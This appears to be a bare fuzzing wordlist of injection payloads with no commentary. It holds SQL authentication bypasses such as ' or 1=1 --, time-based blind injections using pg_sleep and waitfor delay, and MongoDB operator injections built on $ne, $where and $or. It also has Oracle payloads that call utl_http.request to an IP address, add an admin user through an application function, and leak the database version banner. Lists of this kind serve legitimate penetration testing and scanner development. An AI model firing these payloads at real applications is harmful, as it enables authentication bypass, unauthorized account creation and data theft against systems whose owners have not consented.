" or "1"="1
' or 1=1 -- 
or 1=1 or 1=1---
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
";waitfor delay '0:0:__TIME__'--
 or 'whatever' in ('whatever')
 { $ne: 1 }
 {"$ne": null}
 [$ne]=1
 true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
', $or: [ {}, { 'a':'a
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
